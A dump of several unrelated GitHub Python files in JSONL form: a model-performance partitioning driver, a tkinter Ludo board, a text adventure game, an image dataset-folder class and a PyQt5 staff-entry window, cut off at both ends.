default='./20220629_model_info/test_features.npz',\n help='where the test set features live'\n )\n parser.add_argument(\n '--compare_to_random_partition',\n action='store_true',\n help=('whether to compare PerformancePartioner to random partitioner'\n 'that permutes to which feature vector a (prediction, label) pair' \n 'belongs')\n )\n parser.add_argument(\n '--random_state',\n default=42,\n type=int,\n help=('random seed')\n )\n parser.add_argument(\n '--n_null',\n default=1000,\n type=int,\n help=('size of null distribution')\n )\n args = parser.parse_args()\n np.random.seed(args.random_state)\n\n # Load model and model data\n with open(args.model_path, 'rb') as f:\n model_pkl = pickle.load(f)\n model = model_pkl['model']\n feature_order = model_pkl['feature_order']\n features = load_npz(args.feature_path).toarray()\n hats = pd.read_csv(args.label_path)\n labels = hats['labels']\n predictions = hats['predictions']\n\n # Build null distribution\n worst_metrics_null = {'auc' : [], 'accuracy' : [],\n 'average_precision' : [], 'num_groups' : []}\n if args.compare_to_random_partition:\n for i in tqdm(range(args.n_null)):\n indices = [idx for idx in range(len(labels))]\n indices_shuffled = np.random.choice(indices, size=len(indices),\n replace=False)\n labels_random = [labels[idx] for idx in indices_shuffled]\n predictions_random = [predictions[idx] for idx in indices_shuffled]\n clf = tree.DecisionTreeRegressor(min_samples_leaf=2)\n worst_partition = partition_performance(\n attributes=features,\n labels=labels_random,\n predictions=predictions_random,\n clf=clf,\n random_state=args.random_state\n )\n worst_metrics_null['auc'].append(worst_partition['auc'])\n worst_metrics_null['accuracy'].append(worst_partition['accuracy'])\n worst_metrics_null['average_precision'].append(\n worst_partition['average_precision'])\n worst_metrics_null['num_groups'].append(\n worst_partition['num_groups'])\n\n # Get worst performance with with recursive partitioning\n clf = tree.DecisionTreeRegressor(\n min_samples_leaf=2000)\n \n#ccp_alpha=3.329391502327633e-05)\n\n worst_partition = partition_performance(\n attributes=features,\n labels=labels,\n predictions=predictions,\n clf=clf,\n random_state=args.random_state,\n tune=False\n )\n\n # Plot scatter\n metrics = ['scores', 'accuracy', 'auc', 'average_precision', ]\n fig, axs = plt.subplots(1, 4, figsize=(40, 10))\n for i, metric in enumerate(metrics):\n plot_partion_score_vs_metric(worst_partition['ppart'], metric, axs[i])\n os.makedirs(args.outpath, exist_ok=True)\n outfig = os.path.join(args.outpath, '2000_min_sample.png')\n plt.savefig(outfig, bbox_inches='tight', dpi=300)\n\n # Plot actual value againts null distribution\n \n if args.compare_to_random_partition:\n colors = sns.color_palette()\n fig, axs = plt.subplots(1, 4, figsize=(40, 10))\n counter = 0\n for ax, m in zip(axs, worst_metrics_null):\n plot_hist_and_value(value=worst_partition[m],\n null_disrtibution=worst_metrics_null[m],\n ax=ax,\n metric=m,\n color=colors[counter])\n counter += 1\n\n os.makedirs(args.outpath, exist_ok=True)\n outfig = os.path.join(args.outpath, 'compare_to_null.png')\n plt.savefig(outfig, bbox_inches='tight', dpi=300)\n\ndef plot_hist_and_value(value, null_disrtibution, ax, metric, color):\n \"\"\"\n Plots histogram of null distribution and verticl line with actual\n value given a metric and ax\n \"\"\"\n n = len(null_disrtibution)\n pvalue = len([p for p in null_disrtibution if p <= value]) / n\n ax = sns.histplot(x=null_disrtibution,\n bins=20,\n stat='count',\n ax=ax,\n color=color)\n ax.plot([value, value], \n [0, ax.get_ylim()[1]],\n color='black',\n linestyle='--',\n label=f\"Worst Parition auc={round(value, 2)} p < {pvalue}\")\n ax.set_title(f\"Discovered Worst {metric} vs Null Distribution\")\n ax.set_xlabel(f\"Worst {metric}\")\n ax.set_ylabel(\"Count\")\n ax.legend()\n\ndef plot_partion_score_vs_metric(ppart, metric, ax):\n \"\"\"\n Given a fit PerformancePartitioner, plots the predicted scores within\n each partion vs the estimate scores in the parition. \n \n Args:\n ppart: a fit PerformancePartitioner\n metric: which metric to plot againts fit score, can be 'scores', 'auc',\n 'accuracy', 'average_precision'\n \"\"\" \n colors = sns.color_palette(\"icefire\", as_cmap=True)\n valid_inds = [i for i, val in enumerate((ppart.df_partition_scores[metric]))\n if val != 999]\n prevalences = [int(p * 255) for p in \n ppart.df_partition_scores.prevalance[valid_inds]]\n sizes = ppart.df_partition_scores.n_samples[valid_inds] / \\\n max(ppart.df_partition_scores.n_samples[valid_inds]) * 200\n ax.scatter(ppart.df_partition_scores.predicted_scores[valid_inds],\n ppart.df_partition_scores[metric][valid_inds],\n c=[colors.colors[p] for p in prevalences],\n s=sizes)\n ax.set_title(f'Predicted Errors vs Actual {metric}')\n ax.set_xlabel(\"Fit Scores\")\n ax.set_ylabel(f\"Actual {metric}\")\n\ndef partition_performance(attributes, labels, predictions, clf, \n get_worst_path=False, random_state=42, tune=False):\n \"\"\"\n Performs the feature partioning and returns data for logging \n \"\"\"\n worst_path = None\n ppart = PerformancePartitioner(\n attributes=attributes,\n labels=labels,\n predictions=predictions,\n clf=clf,\n random_state=random_state,\n )\n ppart.partition(tune=tune)\n ppart.evaluate()\n \n # Get partition with worst performance\n worst_partition = ppart.df_partition_scores.sort_values('auc').head(1)\n\n if get_worst_path:\n worst_parition_indices = [int(a) for a in \n worst_partition['samples'].split('-')]\n X_worst_partition = ppart.attributes[worst_parition_indices]\n worst_path = ppart.get_paths_for_sample(\n X_test=X_worst_partition\n )\n \n\n return {\n 'auc': float(worst_partition['auc'].values[0]),\n 'accuracy': float(worst_partition['accuracy'].values[0]),\n 'average_precision': float(\n worst_partition['average_precision'].values[0]),\n 'num_groups' : ppart.num_groups,\n 'worst_path' : worst_path,\n 'ppart' : ppart\n }\n\nif __name__ == '__main__':\n main()\n","repo_name":"HealthRex/CDSS","sub_path":"scripts/model_performance_partitioning/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":8029,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"2"} +{"seq_id":"12901275257","text":"import tkinter as tk\nfrom random import randrange\nfrom tkinter import font\n\nfrom configure import *\n\nclass LudoBoard:\n\n def __init__(self, master):\n #master represents parent window set width,height of CANVAS BY REFERENCE OF BOARD CLASS OF SETTING FILE-> OUR LUDO BOARD\n self.canvas = tk.Canvas(master, width=Board.BOARD_WIDTH, height=Board.BOARD_HEIGHT)\n #set \n self.frame = tk.Frame(master, width=Board.PANEL_WIDTH, height=Board.PANEL_HEIGHT, bg=Color.BLUE)\n self.Quit = tk.Button(master, text='QUIT', command=master.quit, relief=tk.RAISED, width=20, height=2,background='red',foreground='white')\n self.title_bar = tk.Label(master, text=Text.HEADER, fg=Color.DEFAULT, bg='black',foreground='blue', font=('Jokerman', 40), relief=tk.RAISED)\n self.status_bar = tk.Label(master, text=Text.MADE_BY, bd=1, relief=tk.SUNKEN)\n\n def draw_rectangle(self, lx, ly, bx, by, color, width):\n self.canvas.create_rectangle(\n lx * Board.SQUARE_SIZE,\n ly * Board.SQUARE_SIZE,\n bx * Board.SQUARE_SIZE,\n by * Board.SQUARE_SIZE,\n fill=color,\n width = width\n )\n\n def draw_polygon(self, x1, y1, x2, y2, color, width):\n self.canvas.create_polygon(\n x1 * Board.SQUARE_SIZE,\n y1 * Board.SQUARE_SIZE,\n Board.BOARD_WIDTH // 2,\n Board.BOARD_HEIGHT // 2,\n x2 * Board.SQUARE_SIZE,\n y2 * Board.SQUARE_SIZE,\n fill=color,\n width=width\n )\n\n def draw_circle(self, x1, y1, x2, y2, color):\n self.canvas.create_oval(\n x1 * Board.SQUARE_SIZE,\n y1 * Board.SQUARE_SIZE,\n x2 * Board.SQUARE_SIZE,\n y2 * Board.SQUARE_SIZE,\n fill=color\n )\n\n def path(self):\n\n self.canvas.place(x=30, y=80)\n #winning path of respective home\n for i in range(6, 9):\n for j in range(15):\n if (j not in range(6, 9) and \n i != 7 or j == 0 or j == 14\n ):\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, '', 1)\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, '', 1)\n else:\n if j < 6:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.YELLOW, 1)\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.GREEN, 1)\n elif j > 8:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.RED, 1)\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.BLUE, 1)\n\n #HOME SYMBOLS FOR RESPECTIVE HOMEs With Gray Circle \n for i, j in Board.POSITIVE_V:\n if i > j:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.YELLOW, 1)\n else:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.RED, 1)\n \n self.draw_circle(i + 0.7, j + 0.7, i + 1.3, j + 1.3, Color.GRAY)\n for j, i in Board.POSITIVE_H:\n if i > j:\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.GREEN, 1)\n else:\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.BLUE, 1)\n self.draw_circle(j + 0.7, i + 0.7, j + 1.3, i + 1.3, Color.GRAY)\n\n def home(self):\n # SET COLOR AND BORDER FOR OUTER PART OF RESPECTIVE HOME's 1st Region\n for i, j in Board.POINTS:\n\n if i == 0 and j == 0:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.GREEN, 3)\n elif i == 0 and j == 1:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.RED, 3)\n elif i == 1 and j == 0:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.YELLOW, 3)\n else:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.BLUE, 3)\n \n self.draw_rectangle(i*9 + 1.25, j*9 + 1.25, i*9 + 5.75, j*9 + 5.75, Color.DEFAULT, 3)\n\n for i, j in Board.POINTS:\n #RESPECTIVE FLAG SIT IN HOME\n if i == 0 and j == 0:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.GREEN, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.GREEN, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.GREEN, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.GREEN, 0)\n elif i == 0 and j == 1:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.RED, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.RED, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.RED, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.RED, 0)\n elif i == 1 and j == 0:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.YELLOW, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.YELLOW, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.YELLOW, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.YELLOW, 0)\n else:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.BLUE, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.BLUE, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.BLUE, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.BLUE, 0)\n\n #RESPECTIVE HOME\"S SPACE IN WINNNING ZONE(TRIANGULAR REGION)\n self.draw_polygon(6.5, 6.5, 6.5, 9.5, Color.GREEN, 1)\n self.draw_polygon(6.5, 6.5, 9.5, 6.5, Color.YELLOW, 1)\n self.draw_polygon(9.5, 9.5, 6.5, 9.5, Color.RED, 1)\n self.draw_polygon(9.5, 9.5, 9.5, 6.5, Color.BLUE, 1)\n\n\n def create_panel(self):\n self.frame.place(x=700, y=100)\n self.Quit.place(x=910, y=620)\n self.title_bar.pack(side=tk.TOP, fill=tk.X)\n self.status_bar.pack(side=tk.BOTTOM, fill=tk.X)\n\n def create(self):\n self.path()\n self.home()\n self.create_panel() \n\n def get_canvas(self):\n return self.canvas\n\n def get_frame(self):\n return self.frame","repo_name":"yash-rao/LUDO","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27526423366","text":"import random\nimport time\n\n# Player Class\nclass Player:\n\n\n def __init__(self, health, stamina, inventory, fur, party):\n self.health = health\n self.stamina = stamina\n self.inventory = inventory\n self.fur = fur\n self.party = party\n\n # Method to allow player to customize fur\n def get_player_fur(self):\n p_fur = {\n \"A\": \"Brown\",\n \"B\": \"White\",\n \"C\": \"Black\",\n }\n get_player_fur = input(\n \"What colour is your fur?\\nA) Brown\\nB) White\\nC) Black \\n\"\n ).upper()\n while get_player_fur not in \"ABC\":\n print(\"Not a valid choice, please select a correct option\")\n get_player_fur = input(\n \"What colour is your fur?\\nA) Brown\\nB) White\\nC) Black \\n\"\n ).upper()\n self.fur = p_fur[get_player_fur]\n\n\n# Function to allow player to chose the direction.\ndef get_player_direction():\n direction = {\n \"A\": \"The armoury\",\n \"B\": \"The dungeon\",\n \"C\": \"The castle\",\n }\n player_direction = input(\n \"Where would you like to go? \\n A) The armoury \\n B) The dungeon \\n C) The Castle\\n\"\n ).upper()\n while player_direction not in \"ABC\":\n print(\"Not a valid choice, please select a correct option\")\n player_direction = input(\n \"Where would you like to go? \\n A) The armoury \\n B) The dungeon \\n C) The Castle \\n\"\n ).upper()\n p_chosen_direction = direction[player_direction]\n\n return p_chosen_direction\n\n\n# The main hub, the village, this function is for the player to get around.\ndef village():\n print(\"You walk into a village close to the castle in the dead of night.\")\n time.sleep(1)\n print(\"To the West there is a shop called 'Yakobs Armoury'.\")\n time.sleep(1)\n print(\n \"To the East there is a sign, with many warnings written in blood. The sign says,\\n 'BEWARE\\n The Dungeon of Neverending Torment\\n This way'\"\n )\n time.sleep(4)\n print(\n \"The castle is not too far from here, if you wanted to, you could head there now.\"\n )\n time.sleep(2)\n p_chosen = get_player_direction()\n return p_chosen\n\n\n# Weapon generator\ndef weapon_generator():\n prefix = {\n 1: \"Nemesis\",\n 2: \"Emberling\",\n 3: \"Soulflare\",\n 4: \"Lament\",\n 5: \"Dusksong\",\n 6: \"Dreamshadow\",\n 7: \"Flameward\",\n 8: \"Crucifier\",\n 9: \"Torrent\",\n 10: \"Starlight\",\n }\n\n type_of_wep = {\n 1: \"Sword\",\n 2: \"Axe\",\n 3: \"Hammer\",\n 4: \"Dagger\",\n 5: \"Staff\",\n }\n\n suffix = {\n 1: \"of the shadows\",\n 2: \"of honor\",\n 3: \"of the immortal\",\n 4: \"of the depth\",\n 5: \"of fury\",\n 6: \"of the sun\",\n 7: \"of the claw\",\n 8: \"of the enigma\",\n 9: \"of grace\",\n 10: \"of horrors\",\n }\n\n prefix_choice = random.randint(1, 10)\n type_choice = random.randint(1, 5)\n suffix_choice = random.randint(1, 10)\n weapon = f\"{prefix[prefix_choice]}, {type_of_wep[type_choice]} {suffix[suffix_choice]}\"\n return weapon\n\n\nLevel = 1\n# Begin the adventure\ndef rungame():\n player = Player(\n 100,\n 10,\n [],\n \"Placeholder\",\n [],\n )\n print(\"Welcome to DUNGEONS AND KITTENS\")\n time.sleep(4)\n input(\"press enter to start:\")\n def the_armoury():\n print(\"Welcome to the armoury\")\n stay = int(input(\"Would you like to browse my wares? 1) Yes, 2) No\\n\"))\n wares = []\n for i in range(3):\n wares.append(weapon_generator())\n while stay == 1:\n\n purchase = int(\n input(\n f\"Which would you like, 1) {wares[0]}, 2) {wares[1]}, 3) {wares[2]}, 4) Nothing?\\n\"\n )\n )\n soldout = \"Sold Out\"\n if purchase == 1:\n player.inventory.append(wares[0])\n wares[0] = soldout\n elif purchase == 2:\n player.inventory.append(wares[1])\n wares[1] = soldout\n elif purchase == 3:\n player.inventory.append(wares[2])\n wares[2] = soldout\n elif purchase == 4:\n break\n print(player.inventory)\n stay = int(input(\"Would you like to buy anything else? 1) Yes, 2) No\\n\"))\n\n\n def the_dungeon():\n global Level\n Level = Level + 1\n\n print(\"You walk into the dungeon\")\n enemy_health = 100\n\n if Level > 1:\n enemy_health = enemy_health * Level\n if Level > 10:\n enemy_health = enemy_health * (Level * 1.5)\n print(f\"You enter level {Level}\")\n time.sleep(1)\n while enemy_health > 0:\n player_damage = random.randint(30, 60) + Level*1.2\n\n if len(player.inventory) > 0:\n if Level == 1:\n player_damage = player_damage + 50\n elif Level > 1:\n player_damage = player_damage + (50 * (Level * 0.6))\n\n print(\n f\"You attack, dealing {player_damage} damage, using {player.inventory[0]}\"\n )\n else:\n print(f\"You attack, dealing {player_damage} damage\")\n time.sleep(2)\n enemy_health = enemy_health - player_damage\n enemy_damage = random.randint(10, 20)\n if Level > 5:\n enemy_damage = random.randint(40, 100)\n elif Level > 10:\n enemy_damage = random.randint(100, 100 + (Level * 1.5))\n if enemy_health > 0:\n print(f\"The enemy attacks, and deals {enemy_damage} damage to you\")\n time.sleep(2)\n player.health = player.health - enemy_damage\n if player.health < 0:\n print(\"You run away from the fight, and retreat to the village to heal\")\n break\n\n print(f\"You have {player.health} hp left, and your enemy has {enemy_health} hp left\")\n \n print(\n \"You return to the village after a deadly battle, knowing where to go next time to get to the next level of the dungeon\"\n )\n time.sleep(2)\n if Level > 0:\n player.health = 100 * Level\n elif Level > 10:\n player.health = player.health + (100 * (Level ^1.2))\n print(f\"You feel stronger, and your health is now {player.health}\")\n time.sleep(3)\n if Level == 10:\n print(\n \"You leave the dungeon with a new weapon, this might be exactly what you need to defeat Cattledoore, 'purrfect whisker of eternal nightmares and damnation jr the third'!\"\n )\n time.sleep(5)\n player.inventory.append(\n \"purrfect whisker of eternal nightmares and damnation jr the third\"\n )\n print(\n \"You now are wielding the 'purrfect whisker of eternal nightmares and damnation jr the third', and can enter the castle.\"\n )\n time.sleep(4)\n\n def the_castle():\n if \"purrfect whisker of eternal nightmares and damnation jr the third\" not in player.inventory:\n print(\n \"You walk into the castle courtyard, and instantly get incinerated by Cattledoore's strong magic!\"\n )\n player.health = 0\n else:\n cattledoore_health = 30000\n while cattledoore_health > 0:\n if len(player.inventory) > 2:\n player_damage = random.randint(50*Level, 55*Level)\n else:\n player_damage = random.randint(25*Level, 30*Level)\n print(f\"You attack Cattledoore, and deal {player_damage}\")\n time.sleep(2)\n cattledoore_health = cattledoore_health - player_damage\n cattledoore_damage = random.randint(0,10)\n if cattledoore_damage == 3:\n print(\"Cattledoore does a super attack, dealing 150 damage.\")\n cattledoore_damage = 150\n player.health = player.health - cattledoore_damage\n print(f\"You are hit for {cattledoore_damage} and have {player.health} hp left\")\n print(\"Cattledoore is killed and you take back the crown. The kingdom is saved!\")\n time.sleep(5)\n print(\"Or so you think\")\n time.sleep(1)\n print(\"...\")\n time.sleep(3)\n print(\"Cattledoore awakens and uses the souls of your people to instantly kill you\")\n player.health = 0\n\n\n player.get_player_fur()\n time.sleep(1)\n print(\n f\"You are a prince, with {player.fur} fur, whose castle has been taken over by the most evil, powerful cat-zard, Cattledoore.\\nNow, Cattledoore is in possesion of all the catnip in Catnipdom, so you must go on a quest, to retake your kingdom and help your people, by finding the 'purrfect whisker of eternal nightmares and damnation jr the third'.\"\n )\n time.sleep(6)\n\n while player.health > 0:\n village_choice = village()\n if village_choice == \"The armoury\":\n the_armoury()\n elif village_choice == \"The dungeon\":\n the_dungeon()\n elif village_choice == \"The castle\":\n the_castle()\n\n print(\"You Died!\")\n print(f\"Score: {Level}\")\n\n\nif __name__ == \"__main__\":\n rungame()\n","repo_name":"Nom115/milestone_3","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21689411107","text":"\"\"\"@xvdp\nDatasetFolder, classification datset where labels are associate to subfolders\n\n.__getitem__() -> magi.features.Item()\n\n\"\"\"\nfrom typing import Union\nimport os\nimport os.path as osp\nimport torch\nfrom torchvision import transforms as TT\nfrom koreto import Col\n\nfrom magi.features.list_util import list_flatten, list_transpose\n\nfrom .datasets import Dataset_M\nfrom ..features import Item, TypedItem, tolist, list_subset, list_removeall\n\n\nIMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')\n\nList = Union[tuple, list]\nLooseList = Union[tuple, list, str]\n\n# pylint: disable=no-member\nclass DatasetFolder_M(Dataset_M):\n \"\"\" similar torchvision.datasets.DatasetFolder using Magi methods\n\n Builds list self.samples = [Item(), ...]\n .__getItem__() returns Item()\n\n parses a folder with subfolders\n folder/\n /\n for in arg 'extensions'\n ...\n /\n\n : assigning\n self.classes = [, ..., ]\n self.class_to_idx = {:0, ..., :n}\n\n : if _get_class_names() method implemente\n self.class_names = [, ..., ]\n\n : if arg 'ordered' samples cycle thru classes with 'ordered' num samples per class per cycle\n\n : if arg 'subset', only a subset of the classes is made into dataset\n\n Args\n data_root (str) root directory of dataset\n mode (str [\"\"]) subfolder under which classes are stored, e.g. 'train', 'val' ...\n name (str [\"\"]) -> self.name = f\"__class__.__name__{name}\"\n subset (list, int [None]) -> returns a subset dataset with classes\n list of foldernames | list of indices | int random set of n folders\n ordered (int [0]) -> if > 0 cycles classes with n 'ordered; elements per class\n extensions (list|str) extensions considered in class folders\n dtype (str [torch.get_default_dtype()])\n device (str [cpu])\n for_display (bool [False]) # augmenters are cloned\n grad (bool [False]) # forces for_display to False, for differentiable augments\n channels (int [3]) | 1,4,None: if None, opens images as stored\n transforms (torchvision.transforms)\n\n \"\"\"\n def __init__(self, data_root=None, mode: str=\"\", name: str=\"\", subset: Union[List, int]=None,\n ordered: int=0, names: list=['image', 'target_index'],\n extensions: LooseList=('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp'),\n dtype: Union[str, torch.dtype]=None, device: Union[str, torch.device]=\"cpu\",\n for_display: bool=False, grad: bool=False, channels: int=3, transforms: TT=None):\n\n\n super().__init__(name=name, dtype=dtype, device=device, for_display=for_display, grad=grad,\n channels=channels, transforms=transforms)\n\n data_root = self.get_dataset_path(data_root)\n self.mode = mode\n self.data_root = osp.join(data_root, mode)\n assert osp.isdir(self.data_root), f\"{Col.YB}'{self.data_root}' not found{Col.AU}\"\n\n self.ext = [ext.lower() for ext in tolist(extensions)]\n self.ordered = ordered\n\n self.classes, self.class_to_idx = self._get_classes(self.data_root, subset)\n self.target_names = []\n self._get_target_names() # implement per dataset\n\n # if no classes, remove all class info\n if not self.target_names:\n list_removeall(names, 'target_name')\n if not self.classes:\n list_removeall(names, ['target_folder', 'target_index'])\n\n self.item = self._define_item(names)\n\n self._make_dataset()\n\n def _define_item(self, names=None):\n \"\"\"\n \"\"\"\n if names is None:\n names = ['image', 'target_index']\n self.keep_names = names.copy() # on __getitem__\n if 'filename' not in names:\n names += ['filename']\n\n # names, kind, dtype\n _elems = {'image': ['data_2d', self.dtype, 'HCHW'],\n 'filename': ['path', 'str', None], # filename\n 'image_index': ['id', 'int', None], # image index\n 'target_folder': ['name', 'str', None], # class folder, e.g. n04557648\n 'target_name': ['name', 'str', None], # class name, e.g. 'water_bottle' # requires self.target_names\n 'target_index': ['id', 'int', None]} # class index\n\n kind = [_elems[name][0] for name in names]\n dtype = [_elems[name][1] for name in names]\n form = [_elems[name][2] for name in names]\n\n return TypedItem(names=names, kind=kind, dtype=dtype, form=form)\n\n def _make_item(self, **kwargs):\n \"\"\"\n Filters kwargs by names defined in self._define_item()\n need to pass the correct items in self._make_dataset()\n \"\"\"\n names = self.item.__dict__['names']\n data = [None]*len(names)\n for i, key in enumerate(names):\n if key in kwargs:\n data[i] = kwargs[key]\n return self.item.spawn(data)\n\n def __getitem__(self, index:str=None) -> Item:\n \"\"\"\n Returns Item(data[index(None)], ...)\n Args:\n index (int): Index if None, randint\n \"\"\"\n index = index if index is not None else torch.randint(0, len(self), (1,)).item()\n item = self.samples[index].deepcopy()\n\n path_idx = item.get_indices(kind=\"path\")[0]\n path_name = item[path_idx] if \"filename\" in self.keep_names else item.pop(path_idx)\n\n item[0] = self.open(path_name)\n item.to_torch(device=self.device)\n\n return item\n\n def __len__(self):\n return len(self.samples)\n\n def _get_classes(self, folder:str=None, subset: Union[List, int]=None) -> tuple:\n \"\"\"\n Returns tuple (classes list, class:index dict).\n Args:\n folder (str) root directory path.\n subset (list | int [None]) subset from classes_names, class_indices, num classes\n \"\"\"\n classes = sorted([d.name for d in os.scandir(folder) if d.is_dir()])\n classes = list_subset(classes, subset)\n # reverse dict\n classes_idx = {classes[i]: i for i in range(len(classes))}\n return classes, classes_idx\n\n def _make_dataset(self) -> None:\n \"\"\" collects images to make dataset\n if list of subfolders, each sub folder becomes a class\n if flatt list, no class information is included\n\n optionally\n can return a dataset ordered (arg, 'ordered' in __init__()) cycling classes\n or a subset of the classes (arg, 'subset' in __init__())\n \"\"\"\n is_file = lambda x: x.is_file() and osp.splitext(x)[-1].lower() in self.ext\n get_files = lambda x: sorted([d.path for d in os.scandir(x) if is_file(d)])\n self.samples = None # delete whatever was there\n\n if not self.classes:\n self.samples = []\n for i, path in enumerate(get_files(self.data_root)):\n self.samples += [self._make_item(filename=path, image_index=i)]\n else:\n i = 0\n samples = []\n for class_id, class_name in enumerate(self.classes):\n class_samples = []\n for _, path in enumerate(get_files(osp.join(self.data_root, class_name))):\n _itemkw = {\"filename\":path, \"image_index\":i, \"target_folder\":class_name, \"target_index\": class_id}\n if \"target_name\" in self.item.__dict__['names']:\n _itemkw[\"target_name\"] = self.target_names[class_id]\n class_samples.append(self._make_item(**_itemkw))\n i += 1\n samples.append(class_samples)\n\n self.samples = samples\n if self.ordered:\n self.samples = list_transpose(samples, self.ordered)\n else:\n self.samples = list_flatten(samples, depth=1)\n\n\n def _get_target_names(self) -> None:\n self.target_names = []\n ## implementation of mapping between folders and names\n ## eg. with ImageNet\n # from nltk.corpus import wordnet\n # self.target_names = []\n # if self.classes:\n # for wni in self.classes:\n # tgt = wordnet.synset_from_pos_and_offset(wni[0], int(wni[1:])).lemma_names('eng')[0]\n # self.target_names.append(tgt)\n","repo_name":"xvdp/magi","sub_path":"magi/datasets/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14923394169","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom Metodi.Metodi import Metodi\nfrom Staff.Model.Staff import Staff\nfrom Staff.Controller.ControllerStaff import ControllerStaff\n\n\nclass ViewAggiungiStaff(object):\n objMetodi = Metodi()\n\n def __init__(self, aggiorna_staff):\n self.aggiorna_staff = aggiorna_staff\n self.controller = ControllerStaff()\n\n def salva_nuovo_dipendente(self):\n try:\n if self.txtNome.text() != \"\" and self.txtCognome.text() != \"\" and self.txtCodiceFiscale.text() != \"\" \\\n and self.txtOre.text() != \"\" and self.txtTitolo.text() != \"\":\n if self.controller.controlla_unicita(self.txtCodiceFiscale.text()):\n nuovo_dipendente = Staff(self.txtNome.text(), self.txtCognome.text(), self.txtCodiceFiscale.text(),\n self.txtOre.text(), self.txtTitolo.text(), \"1\")\n self.controller.aggiungi_dipendente(nuovo_dipendente)\n self.aggiorna_staff()\n self.objMetodi.show_popup_ok(\"Elemento aggiunto con successo.\")\n self.view_aggiungi_staff.close()\n else:\n self.objMetodi.show_popup_exception(\"Utente già registrato.\")\n else:\n self.objMetodi.show_popup_exception(\"Uno o più campi risultano vuoti.\")\n except(Exception):\n self.objMetodi.show_popup_exception(\"Errore\")\n\n def cancella_riempimento(self):\n self.txtNome.setText(\"\")\n self.txtCognome.setText(\"\")\n self.txtCodiceFiscale.setText(\"\")\n self.txtOre.setText(\"\")\n self.txtTitolo.setText(\"\")\n\n def setupUi(self, MainWindow):\n self.view_aggiungi_staff = MainWindow\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(670, 514)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.lblTitle = QtWidgets.QLabel(self.centralwidget)\n self.lblTitle.setGeometry(QtCore.QRect(30, 30, 601, 91))\n font = QtGui.QFont()\n font.setFamily(\"MS Serif\")\n font.setPointSize(21)\n self.lblTitle.setFont(font)\n self.lblTitle.setObjectName(\"lblTitle\")\n self.txtNome = QtWidgets.QLineEdit(self.centralwidget)\n self.txtNome.setGeometry(QtCore.QRect(280, 150, 151, 31))\n self.txtNome.setObjectName(\"txtNome\")\n self.lblNome = QtWidgets.QLabel(self.centralwidget)\n self.lblNome.setGeometry(QtCore.QRect(180, 150, 91, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblNome.setFont(font)\n self.lblNome.setObjectName(\"lblNome\")\n self.lblCognome = QtWidgets.QLabel(self.centralwidget)\n self.lblCognome.setGeometry(QtCore.QRect(160, 190, 111, 31))\n font = 